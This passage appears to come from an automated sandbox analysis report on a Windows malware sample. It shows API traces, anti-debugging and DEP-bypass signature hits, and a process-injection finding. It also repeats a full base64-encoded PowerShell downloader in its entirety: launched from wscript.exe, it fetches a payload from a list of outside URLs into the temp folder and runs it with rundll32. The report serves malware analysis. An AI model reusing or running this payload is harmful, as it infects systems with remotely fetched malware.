QBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBZADgASQBzAGoAaQBPAFYAVwBRAHMALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAEkAQQB3AHMAZgBHAFkARgBIAHUALABoAHQAdABwAHMAOgAvAC8AYgBsAG8AZwBkAG8AYwBpAHMAbgBlAGkAcgBvAHMALgBjAG8AbQAuAGIAcgAvAEcATwBtAC8AQwBaAFcAZQBOAFkAUgBHAE4AVwAsAGgAdAB0AHAAcwA6AC8ALwBpAG0AbQB1AG4AbwBsAGkAZABlAHIAYQB6AGcAbwB5AG8AcABvAHIAdAB1AG4AaQBkAGEAZAAuAGMAbwBtAC8AeABxAGEANgBDAG4AeQAvADcARABOAHEAOABjAFcAawBFAE8AcgAsAGgAdAB0AHAAcwA6AC8ALwBjAG8AbQB1AG4AaQBkAGEAZABlAGgAZQBiAHIAbwBtAC4AYwBvAG0ALgBiAHIALwAwAFAAMQA2AC8ASABMAEUAVABRAFIASgAwAGsALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAEwAdQBPAE0AOQB0AFgAYwBpAFkAOQAsAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQB5AG8AdQBuAGcAYQBuAGQAdABoAGUAcgBhAHQAYwBoAGUAdAAuAGMAbwBtAC8ASQB6AHYATwAvAEQASQBZAEIARQB5ADQAMAB2AHYANwAwACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBGAEcAdgA5AEIAbABaAHgAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAGkAbgAgACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEAOQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAZABpAGgAeQBkAHIAaQBjAC4AYgBlAGgAYQB2AGkAbwByAHMAUAByAG8AZgBhAG4AaQB6AGUAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBZADgASQBzAGoAaQBPAFYAVwBRAHMALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAEkAQQB3AHMAZgBHAFkARgBIAHUALABoAHQAdABwAHMAOgAvAC8AYgBsAG8AZwBkAG8AYwBpAHMAbgBlAGkAcgBvAHMALgBjAG8AbQAuAGIAcgAvAEcATwBtAC8AQwBaAFcAZQBOAFkAUgBHAE4AVwAsAGgAdAB0AHAAcwA6AC8ALwBpAG0AbQB1AG4AbwBsAGkAZABlAHIAYQB6AGcAbwB5AG8AcABvAHIAdAB1AG4AaQBkAGEAZAAuAGMAbwBtAC8AeABxAGEANgBDAG4AeQAvADcARABOAHEAOABjAFcAawBFAE8AcgAsAGgAdAB0AHAAcwA6AC8ALwBjAG8AbQB1AG4AaQBkAGEAZABlAGgAZQBiAHIAbwBtAC4AYwBvAG0ALgBiAHIALwAwAFAAMQA2AC8ASABMAEUAVABRAFIASgAwAGsALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAEwAdQBPAE0AOQB0AFgAYwBpAFkAOQAsAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQB5AG8AdQBuAGcAYQBuAGQAdABoAGUAcgBhAHQAYwBoAGUAdAAuAGMAbwBtAC8ASQB6AHYATwAvAEQASQBZAEIARQB5ADQAMAB2AHYANwAwACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBGAEcAdgA5AEIAbABaAHgAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAGkAbgAgACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEAOQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAZABpAGgAeQBkAHIAaQBjAC4AYgBlAGgAYQB2AGkAbwByAHMAUAByAG8AZgBhAG4AaQB6AGUAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
parent_process wscript.exe martian_process powershell -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBZADgASQBzAGoAaQBPAFYAVwBRAHMALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAEkAQQB3AHMAZgBHAFkARgBIAHUALABoAHQAdABwAHMAOgAvAC8AYgBsAG8AZwBkAG8AYwBpAHMAbgBlAGkAcgBvAHMALgBjAG8AbQAuAGIAcgAvAEcATwBtAC8AQwBaAFcAZQBOAFkAUgBHAE4AVwAsAGgAdAB0AHAAcwA6AC8ALwBpAG0AbQB1AG4AbwBsAGkAZABlAHIAYQB6AGcAbwB5AG8AcABvAHIAdAB1AG4AaQBkAGEAZAAuAGMAbwBtAC8AeABxAGEANgBDAG4AeQAvADcARABOAHEAOABjAFcAawBFAE8AcgAsAGgAdAB0AHAAcwA6AC8ALwBjAG8AbQB1AG4AaQBkAGEAZABlAGgAZQBiAHIAbwBtAC4AYwBvAG0ALgBiAHIALwAwAFAAMQA2AC8ASABMAEUAVABRAFIASgAwAGsALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAEwAdQBPAE0AOQB0AFgAYwBpAFkAOQAsAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQB5AG8AdQBuAGcAYQBuAGQAdABoAGUAcgBhAHQAYwBoAGUAdAAuAGMAbwBtAC8ASQB6AHYATwAvAEQASQBZAEIARQB5ADQAMAB2AHYANwAwACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBGAEcAdgA5AEIAbABaAHgAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAGkAbgAgACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEAOQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAZABpAGgAeQBkAHIAaQBjAC4AYgBlAGgAYQB2AGkAbwByAHMAUAByAG8AZgBhAG4AaQB6AGUAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AYgBlAGIAZQBzAHMAaQAuAGMAbwBtAC4AdAByAC8AUQA5AFEAYgBTAGkALwBZADgASQBzAGoAaQBPAFYAVwBRAHMALABoAHQAdABwAHMAOgAvAC8AYwBvAHoAYQByAHEAaQBuAGcAZQBuAGkAZQByAGkAYQAuAGMAbwBtAC4AbQB4AC8AUgA1AEEAdwBrAGgANAAvAEkAQQB3AHMAZgBHAFkARgBIAHUALABoAHQAdABwAHMAOgAvAC8AYgBsAG8AZwBkAG8AYwBpAHMAbgBlAGkAcgBvAHMALgBjAG8AbQAuAGIAcgAvAEcATwBtAC8AQwBaAFcAZQBOAFkAUgBHAE4AVwAsAGgAdAB0AHAAcwA6AC8ALwBpAG0AbQB1AG4AbwBsAGkAZABlAHIAYQB6AGcAbwB5AG8AcABvAHIAdAB1AG4AaQBkAGEAZAAuAGMAbwBtAC8AeABxAGEANgBDAG4AeQAvADcARABOAHEAOABjAFcAawBFAE8AcgAsAGgAdAB0AHAAcwA6AC8ALwBjAG8AbQB1AG4AaQBkAGEAZABlAGgAZQBiAHIAbwBtAC4AYwBvAG0ALgBiAHIALwAwAFAAMQA2AC8ASABMAEUAVABRAFIASgAwAGsALABoAHQAdABwAHMAOgAvAC8AdABoAGUAdwBhAHQAYwBoAHoAbwBuAGUAYgBkAC4AYwBvAG0ALwB0AGsAaAA0AFAASAAvAEwAdQBPAE0AOQB0AFgAYwBpAFkAOQAsAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQB5AG8AdQBuAGcAYQBuAGQAdABoAGUAcgBhAHQAYwBoAGUAdAAuAGMAbwBtAC8ASQB6AHYATwAvAEQASQBZAEIARQB5ADQAMAB2AHYANwAwACwAaAB0AHQAcAA6AC8ALwB1AG4AaQB0AGUAZABlAGMALQBlAGcALgBjAG8AbQAvAEkARgBVADYAbABsAFoALwBGAEcAdgA5AEIAbABaAHgAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAGkAbgAgACQAcAByAG8AYQByAGIAaQB0AHIAYQB0AGkAbwBuACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJAB1AG4AdgBlAHIAbQBpAG4AbwB1AHMAbgBlAHMAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEAOQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAZABpAGgAeQBkAHIAaQBjAC4AYgBlAGgAYQB2AGkAbwByAHMAUAByAG8AZgBhAG4AaQB6AGUAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABkAGkAaAB5AGQAcgBpAGMALgBiAGUAaABhAHYAaQBvAHIAcwBQAHIAbwBmAGEAbgBpAHoAZQAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
Process injection Process 1020 resumed a thread in remote process 2152
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000300
suspend_count: 1
process_identifier: 2152
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe